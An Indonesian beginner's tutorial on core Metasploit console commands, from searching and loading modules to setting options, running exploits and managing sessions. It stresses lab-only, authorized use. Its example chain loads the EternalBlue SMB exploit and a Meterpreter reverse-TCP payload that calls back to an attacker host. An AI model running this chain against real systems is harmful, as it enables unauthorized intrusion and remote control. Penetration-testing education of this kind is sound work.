Command Dasar Metasploit yang Wajib Diketahui Pemula
Setelah berhasil menginstal Metasploit Framework dan menjalankan msfconsole, langkah berikutnya adalah memahami command dasar yang sering digunakan. Buat kamu yang lagi belajar cybersecurity, penetration testing, atau ethical hacking, menguasai command dasar ini adalah fondasi utama sebelum masuk ke tahap eksploitasi lebih lanjut.
Artikel ini akan membahas command-command penting di Metasploit dengan penjelasan santai tapi tetap teknis. Ingat, gunakan hanya di lingkungan lab atau sistem yang kamu punya izin resmi ya.
1. Masuk ke msfconsole
Untuk memulai, jalankan:
msfconsole Ini akan membuka interface utama Metasploit. Semua command utama dijalankan dari sini.
2. Command Navigasi Dasar
help
Kalau kamu lupa command, gunakan:
help Perintah ini akan menampilkan daftar command yang tersedia.
clear
clear Untuk membersihkan layar terminal agar lebih rapi.
exit
exit Keluar dari msfconsole.
3. Mencari Modul (search)
Metasploit punya ribuan modul. Untuk mencari modul tertentu, gunakan:
search keyword Contoh:
search ftp Command ini akan menampilkan semua modul yang berhubungan dengan FTP.
Kamu juga bisa filter berdasarkan tipe:
search type:exploit platform:windows 4. Menggunakan Modul (use)
Setelah menemukan modul yang ingin digunakan:
use path/modul Contoh:
use exploit/windows/smb/ms17_010_eternalblue Setelah masuk ke modul tersebut, prompt akan berubah menandakan kamu sedang berada di dalam modul itu.
5. Melihat Informasi Modul (info)
Sebelum menjalankan modul, cek dulu informasinya:
info Command ini menampilkan detail seperti:
- Deskripsi modul
- Author
- Referensi CVE
- Target sistem
- Opsi yang dibutuhkan
Ini penting supaya kamu tahu apa yang sedang kamu jalankan.
6. Melihat dan Mengatur Opsi (show & set)
show options
show options Menampilkan parameter yang harus diisi sebelum modul dijalankan.
set
Untuk mengatur parameter:
set PARAMETER nilai Contoh di lab testing:
set RHOSTS 192.168.56.101 set LHOST 192.168.56.1 Catatan: Gunakan IP lab (VirtualBox/VMware), jangan target sembarangan.
unset
unset PARAMETER Untuk menghapus parameter yang sudah diset.
7. Melihat Payload (show payloads)
Beberapa exploit membutuhkan payload. Untuk melihat payload yang tersedia:
show payloads Lalu pilih salah satu:
set PAYLOAD windows/meterpreter/reverse_tcp 8. Menjalankan Modul (run / exploit)
Setelah semua parameter terisi:
exploit Atau:
run Kedua command ini berfungsi untuk menjalankan modul.
9. Melihat Session (sessions)
Jika eksploitasi berhasil dan menghasilkan session:
sessions Untuk masuk ke session tertentu:
sessions -i 1 Ini biasanya digunakan saat mendapatkan akses meterpreter di lingkungan lab.
10. Background dan Kembali ke Console
Jika sedang berada di dalam session meterpreter dan ingin kembali ke msfconsole:
background Tips Belajar Command Metasploit Biar Cepat Paham
- Latihan di lab seperti Metasploitable
- Gunakan VirtualBox atau VMware
- Coba pahami alur: search → use → show options → set → exploit
- Jangan langsung fokus hacking, pahami konsep vulnerability dulu
Kesimpulan
Command dasar Metasploit seperti search, use, show options, set, exploit, sessions adalah fondasi utama dalam penetration testing menggunakan framework ini. Tanpa memahami command ini, kamu akan kesulitan melangkah ke tahap yang lebih advanced seperti post-exploitation atau pembuatan payload custom.
Buat Gen Z yang ingin terjun ke dunia cybersecurity, Metasploit adalah tools wajib yang harus dikuasai. Tapi ingat, skill ini powerful banget — gunakan secara etis dan profesional.
Di artikel berikutnya, kita bisa bahas tentang struktur modul Metasploit atau cara membuat lab hacking sendiri biar makin pro 🚀